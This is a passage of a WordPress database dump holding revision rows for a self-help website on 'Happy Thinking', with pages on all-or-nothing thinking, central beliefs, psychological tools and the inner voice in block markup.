class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>As you have seen in the above examples, all-or-nothing thinking distorts how things really are, and this can make one make wrong judgments. In the tools section of this website, we will talk about how to see things in a more balanced way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-core-beliefs/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'All or nothing thinking', '', 'inherit', 'closed', 'closed', '', '1627-revision-v1', '', '', '2023-08-06 15:58:58', '2023-08-06 15:58:58', '', 1627, 'https://www.happythinking.com/?p=2051', 0, 'revision', '', 0),
(2053, 1, '2023-08-06 16:01:47', '2023-08-06 16:01:47', '<!-- wp:paragraph -->\n<p>First of all, let me make it clear that when I talk about â€œbeliefsâ€, I certainly do not mean religious beliefs! Rather, it is about the beliefs that one has about:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>oneself</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>other people</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>the world around you</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>For example, regarding oneself, one might have the belief, â€œI am caringâ€. Regarding others, one might have the belief, â€œPeople are selfishâ€ and regarding the world, one might have the belief, â€œThere are a lot of dangers out there.â€ Such beliefs are central to a person''s view of everything within and outside, and for this reason I call them â€œcentral beliefs''''. (Many psychologists call such beliefs, â€œcore beliefsâ€)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When one is born, oneâ€™s mind essentially has no beliefs about anything. However, from that blank state onwards, one starts to form beliefs about various things. For example, even as a baby, one would learn which faces belong to those that will cuddle and give nourishment and which faces belong to those who provide no benefit. I.e. one forms certain beliefs about who is â€œgoodâ€ for oneâ€™s survival and who is â€œbadâ€. As oneâ€™s childhood years progress, one''s brain continually updates oneâ€™s central beliefs.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Central beliefs are the driving force of a person, and one''s mind tries its best to think in ways that â€œsupportâ€ such central beliefs. I call thoughts that support oneâ€™s central beliefs, â€œsupporting thoughtsâ€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that a person has the central belief, â€œI can learn new thingsâ€. For this central belief, one of the supportive thoughts might be, â€œIf I have an opportunity to learn new things, I should take up that opportunityâ€. Letâ€™s take another example, where a person, who we will call Sujith, has the central belief, â€œI have good leadership skillsâ€. Now suppose Sujith, at a social event, meets an owner of a major company and that person offers Sujith a very attractive job as a manager. In this situation, Sujithâ€™s mind may develop the supporting thought, â€œI have the skills that will help me to do well in this new job, therefore I should accept itâ€, prompting him to take up that offer. However, let us now imagine that Sujith''s mind has the opposite central belief, â€œI have poor leadership skillsâ€. In this scenario, if he was offered the same job, his mind might have the supporting thought, â€œYou have useless leadership skills and you will therefore fail in this new jobâ€, prompting him to refuse the job offer. The supporting thoughts blindly support one''s central beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As central beliefs direct almost all aspects of oneâ€™s life, itâ€™s very important that one has central beliefs that truly represent oneself. You may now wonder how one can have central beliefs that do not truly represent oneself. Unfortunately, this can happen quite easily and I will explain how. As mentioned before, central beliefs often start to form in oneâ€™s childhood, which is a time when oneâ€™s mind is not fully developed and is quite immature. This can lead to one having central beliefs that may not be truly logical. For example, imagine that a small child, who we will call Gaby, is with her mother, who is quite preoccupied with some pressing issue. As they walk in the park, imagine that Gabyâ€™s mother buys her an ice cream. Unfortunately, a few minutes later, imagine that Gaby accidentally drops the ice cream, and her mother, in a lapse of concentration, says, â€œYou are stupidâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Gaby, who does not have the mental maturity of an adult, may take this statement coming from her mother seriously and this may lead to the formation of the untrue central belief, â€œI am stupidâ€ in her mind.&nbsp; Now you might say, â€œSurely, when Gaby grows up, she would replace this with a more realistic core belief, such as â€œI am not stupid.â€ Unfortunately, things are not all that logical when it comes to the mind! What can happen is that some childhood central beliefs can remain unchanged in oneâ€™s mind and persist into adulthood. Itâ€™s almost as if oneâ€™s mind forgets that the central beliefs are from one''s childhood, and instead just â€œassumesâ€ that such beliefs must be true.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Such unchallenged untrue central beliefs that persist into adulthood can cause harm. In the case of Gaby, her childhood untrue central belief, â€œI am stupidâ€, may remain unchallenged with new logical thinking as she grows up and this could limit her potential as an adult. For example, this unchallenged untrue central belief may well dissuade Gaby from pursuing a university education. This would be a pity, because if she disregarded her untrue central belief, she may well have flourished in university.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Such unchallenged untrue central beliefs may remain quietly in the background, and get activated at only certain times. For example, continuing with the ice cream example, the adult Gaby may not always be thinking â€œI am stupid.â€ But say, when Gaby thinks about applying for a university education, the â€œI am stupidâ€ untrue central belief may surface at that moment, and dissuade her from continuing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Untrue central beliefs can sometimes be difficult to discover as they may lie in the background. However, you will recall that untrue central beliefs are associated with â€œsupporting thoughtsâ€. If one cannot work out oneâ€™s untrue central beliefs, one may be able to recognise the supporting thoughts instead. For example, when thinking about her higher education, Gaby may not recognise the untrue central belief â€œI am stupidâ€, but instead, she may recognise the supporting thought, â€œI should not apply to university, as I will surely fail if I enrolled in one.â€ Such supporting thoughts that support untrue central core beliefs can unnecessarily negatively affect oneâ€™s life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can imagine, unchallenged untrue central beliefs can unnecessarily limit a person''s potential. One goal of happy thinking is of course to deal with such beliefs. However, we will keep that for later on the website, when we discuss various psychological tools that you can use to access and change untrue central beliefs. For now, just remember the basic concept of central beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all-or-nothing-thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/psychological-tools/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Untrue central beliefs', '', 'inherit', 'closed', 'closed', '', '1632-revision-v1', '', '', '2023-08-06 16:01:47', '2023-08-06 16:01:47', '', 1632, 'https://www.happythinking.com/?p=2053', 0, 'revision', '', 0),
(2058, 1, '2023-08-06 17:08:00', '2023-08-06 17:08:00', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2056,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking_6_8_2023.jpg" alt="" class="wp-image-2056"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in one''s happiness. Over time, oneâ€™s mind may have developed certain ways of thinking that are not helpful to oneâ€™s mental well-being. Such â€œunhelpful ways of thinkingâ€ are very common and can happen to anyone. One may not even realise that one is thinking in such ways.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are to achieve the best possible happiness in your life, it is important to recognise and change unhelpful ways of thinking when it happens to you. On this free website, I will describe to you the common types of unhelpful thinking that people do. This will help you to recognise unhelpful thinking when it happens to you. I will also explain to you various mental tools that you can use to deal with unhelpful thinking. Such mental tools will be very practical so that you will be able to use them in your daily life. As you change your thinking from unhelpful to helpful ways, you will find yourself becoming happier.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing types of unhelpful thinking and giving tools to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising unhelpful thinking, using mental tools to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that practising happy thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2054,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_060823.jpg" alt="" class="wp-image-2054"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing unhelpful thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-08-06 17:08:00', '2023-08-06 17:08:00', '', 88, 'https://www.happythinking.com/?p=2058', 0, 'revision', '', 0),
(2057, 1, '2023-08-06 17:07:36', '2023-08-06 17:07:36', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2056,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking_6_8_2023.jpg" alt="" class="wp-image-2056"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in one''s happiness. Over time, oneâ€™s mind may have developed certain ways of thinking that are not helpful to oneâ€™s mental well-being. Such â€œunhelpful ways of thinkingâ€ are very common and can happen to anyone. One may not even realise that one is thinking in such ways.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are to achieve the best possible happiness in your life, it is important to recognise and change unhelpful ways of thinking when it happens to you. On this free website, I will describe to you the common types of unhelpful thinking that people do. This will help you to recognise unhelpful thinking when it happens to you. I will also explain to you various mental tools that you can use to deal with unhelpful thinking. Such mental tools will be very practical so that you will be able to use them in your daily life. As you change your thinking from unhelpful to helpful ways, you will find yourself becoming happier.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing types of unhelpful thinking and giving tools to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising unhelpful thinking, using mental tools to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that practising happy thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2054,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_060823.jpg" alt="" class="wp-image-2054"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-08-06 17:07:36', '2023-08-06 17:07:36', '', 88, 'https://www.happythinking.com/?p=2057', 0, 'revision', '', 0),
(2059, 1, '2023-08-07 10:13:50', '2023-08-07 10:13:50', '', 'home_happythinking080723', '', 'inherit', '', 'closed', '', 'home_happythinking080723', '', '', '2023-08-07 10:13:50', '2023-08-07 10:13:50', '', 88, 'https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg', 0, 'attachment', 'image/jpeg', 0),
(2060, 1, '2023-08-07 10:14:11', '2023-08-07 10:14:11', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":2059,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking080723.jpg" alt="" class="wp-image-2059"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This free website will share with you the concept of â€œHappy Thinkingâ€ which can help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in one''s happiness. Over time, oneâ€™s mind may have developed certain ways of thinking that are not helpful to oneâ€™s mental well-being. Such â€œunhelpful ways of thinkingâ€ are very common and can happen to anyone. One may not even realise that one is thinking in such ways.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are to achieve the best possible happiness in your life, it is important to recognise and change unhelpful ways of thinking when it happens to you. On this free website, I will describe to you the common types of unhelpful thinking that people do. This will help you to recognise unhelpful thinking when it happens to you. I will also explain to you various mental tools that you can use to deal with unhelpful thinking. Such mental tools will be very practical so that you will be able to use them in your daily life. As you change your thinking from unhelpful to helpful ways, you will find yourself becoming happier.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to describing types of unhelpful thinking and giving tools to change such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help one to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These three ingredients, i.e. recognising unhelpful thinking, using mental tools to deal with it and using wisdom to see the world differently, together make the concept of â€œHappy Thinkingâ€. I am confident that practising happy thinking will help you to find happiness in your life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2054,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_060823.jpg" alt="" class="wp-image-2054"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>This website on happy thinking is truly free for you (and your family and friends!) to benefit from. There is nothing to buy, download, register or any other sales tactics. All I wish is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-08-07 10:14:11', '2023-08-07 10:14:11', '', 88, 'https://www.happythinking.com/?p=2060', 0, 'revision', '', 0),
(2066, 1, '2023-08-09 18:29:14', '2023-08-09 18:29:14', '<!-- wp:paragraph -->\n<p>In the past sections, we went through common unhelpful thinking patterns that can contribute to one being unhappy. Now that you understand these unhelpful thinking patterns you will be able to recognise such thinking when it happens in your own mind. However, while recognition itself might make you feel better, the real changes will only come when you are able to change unhelpful thinking patterns into more helpful thinking patterns.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It would have been wonderful if there was a magical brain surgeon who could magically rewire our brains so that we would be able to think in more helpful ways. Unfortunately, such magical surgeons do not exist, and I doubt something like that would be even possible in our lifetime. While scientific understanding of how our brains work has progressed hugely, we still know very little and there is a long way to go before seeing exactly how â€œthinkingâ€ happens. However, luckily for us, the human mind has an amazing power, which is the power to heal itself. Our minds have the ability to analyse our thoughts and change themselves.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can oneâ€™s mind change itself? This can be done using certain â€œmental toolsâ€, somewhat like how a car mechanic would use various tools to fix a car not running well. Of course, the tools one can use on the mind are not made of metal! Instead, the mental tools that I will share with you are made of psychological techniques that one can use to change how one thinks. In the next sections of this website, I will share with you these psychological tools which you can use to change your thinking into ways that promote happiness in you (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of the psychological tools will help you better notice when you are thinking in unhelpful ways. i.e. you will become more â€œsensitiveâ€ in detecting unhelpful thinking patterns when it happens in your mind. Other tools will help you to change unhelpful thinking patterns into helpful thinking patterns.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some tools will be more useful to use right at the moment that you detect unhelpful thinking patterns in your mind, whereas other tools will be more useful at times when you are able to reflect on how you were thinking on the day. i.e. some tools are â€œimmediate useâ€ tools whereas others are â€œuse laterâ€ tools, to be used when you are relaxed.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When an engineer uses tools to fix a machine, they have to choose the correct tool. Not all tools will be useful to repair a given fault. Also, sometimes, a fault will need multiple tools to be used together. The use of psychological tools is no different. You will need to try various tools to see which one works for you. And also, you may well need to use more than one tool at the same time.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You may find that some of the psychological tools may appear to be â€œsimpleâ€, and this may put you off. Do not confuse simple as being the same as being â€œineffectiveâ€! Many solutions in life do not have to be complex, and the key is to try and judge for yourself how useful or not useful something is. Do not prejudge, rather, give the tools a chance before putting them away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unhelpful thinking patterns can develop over many years and get entrenched into oneâ€™s mind, making oneâ€™s mind resist change. Therefore please give time for the tools to work. Do not expect instant cures.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the next sections of this website, you will embark on learning about the various psychological tools that I will share with you. As you start your journey, remember to open up your mind to change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-core-beliefs/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/inner-voice/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Psychological tools', '', 'inherit', 'closed', 'closed', '', '1641-revision-v1', '', '', '2023-08-09 18:29:14', '2023-08-09 18:29:14', '', 1641, 'https://www.happythinking.com/?p=2066', 0, 'revision', '', 0),
(2067, 1, '2023-08-09 18:29:55', '2023-08-09 18:29:55', '<!-- wp:paragraph -->\n<p>As mentioned before, â€œHappy Thinkingâ€ is about dealing with unhelpful thinking patterns using â€œtoolsâ€. However, the tools one uses to deal with oneâ€™s mind are obviously not real metal tools like what a mechanic might use! One cannot open up oneâ€™s skull to work on oneâ€™s mind (please do not even try!). Luckily a more practical option is however available to all of us, and that is to use oneâ€™s inner voice to â€œtalkâ€ to oneâ€™s mind and change how it thinks. This is not as strange as you may imagine. Everyone has an inner voice which is the voice you use when â€œthinkingâ€ to yourself. For example when you look out of a window, your â€œvoiceâ€ might tell you, â€œWow, this view is so beautifulâ€. In some people, this voice is quite obvious all the time, whereas, in others, it may mostly be subtle and relatively silent. One may â€œhearâ€ oneâ€™s inner voice when one reads and perhaps you can hear your inner voice right now as you read this very sentence!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all can listen to our inner voice. For example, if I ask you to silently tell yourself the answer to the hopefully simple mathematical problem, â€œ4 + 4 = ?â€, it''s your inner voice that will speak to you and say â€œ8â€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Many tools in happy thinking will use oneâ€™s inner voice to deal with oneâ€™s thoughts. Itâ€™s sort of like talking to oneself, but doing so inside oneâ€™s mind rather than speaking words out loud. In the next section, I will discuss with you the â€œpause toolâ€ and this will make it clear to you how you can use your inner voice to deal with thoughts in your mind.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/psychological-tools/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/pause/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Inner voice', '', 'inherit', 'closed', 'closed', '', '1646-revision-v1', '', '', '2023-08-09 18:29:55', '2023-08-09 18:29:55', '', 1646, 'https://www.happythinking.com/?p=2067', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(2065, 1, '2023-08-09 18:25:26', '2023-08-09 18:25:26', '<!-- wp:paragraph -->\n<p>First of all, let me make it clear that when I talk about â€œbeliefsâ€, I certainly do not mean religious beliefs! Rather, it is about the beliefs that one has about:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>oneself</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>other people</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>the world around you</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>For example, regarding oneself, one might have the belief, â€œI am caringâ€. Regarding others, one might have the belief, â€œPeople are selfishâ€ and regarding the world, one might have the belief, â€œThere are a lot of dangers out there.â€ Such beliefs are central to a person''s view of everything within and outside, and for this reason I call them â€œcentral beliefs''''. (Many psychologists call such beliefs, â€œcore beliefsâ€)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When one is born, oneâ€™s mind essentially has no beliefs about anything. However, from that blank state onwards, one starts to form beliefs about various things. For example, even as a baby, one would learn which faces belong to those that will cuddle and give nourishment and which faces belong to those who provide no benefit. I.e. one forms certain beliefs about who is â€œgoodâ€ for oneâ€™s survival and who is â€œbadâ€. As oneâ€™s childhood years progress, one''s brain continually updates oneâ€™s central beliefs.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Central beliefs are the driving force of a person, and one''s mind tries its best to think in ways that â€œsupportâ€ such central beliefs. I call thoughts that support oneâ€™s central beliefs, â€œsupporting thoughtsâ€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that a person has the central belief, â€œI can learn new thingsâ€. For this central belief, one of the supportive thoughts might be, â€œIf I have an opportunity to learn new things, I should take up that opportunityâ€. Letâ€™s take another example, where a person, who we will call Sujith, has the central belief, â€œI have good leadership skillsâ€. Now suppose Sujith, at a social event, meets an owner of a major company and that person offers Sujith a very attractive job as a manager. In this situation, Sujithâ€™s mind may develop the supporting thought, â€œI have the skills that will help me to do well in this new job, therefore I should accept itâ€, prompting him to take up that offer. However, let 